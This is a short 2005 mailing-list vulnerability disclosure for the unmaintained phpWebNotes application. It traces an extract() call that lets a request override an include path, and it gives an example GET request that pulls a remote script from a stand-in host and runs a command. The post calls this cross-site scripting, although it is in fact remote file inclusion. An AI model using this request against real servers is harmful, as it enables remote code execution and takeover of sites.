Date: Sat, 27 Aug 2005 11:19:22 +0200
From: nf2 <nf2@...einwelt.at>
To: bugtraq@...urityfocus.com
Subject: XSS security hole in phpwebnotes.

Hi security team!

I have found a security hole in a popular php application (not
maintained anymore). The hole already gets exploited - our server was
hacked that way two days ago. Probably hackers just use google to find
installations of phpwebnotes.

Version: phpWebNotes-2.0.0-pr1.tar.gz (last)

the bug is in php_api.php line 77:

extract($REQUEST);

this allowes to change $t_path_core which is used in api.php:

require_once( $t_path_core . 'constants_inc.php' );

this can be used for a cross site scripting attack.

how does it work:

GET
http://server/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id

http://www.futureware.biz/webnotes/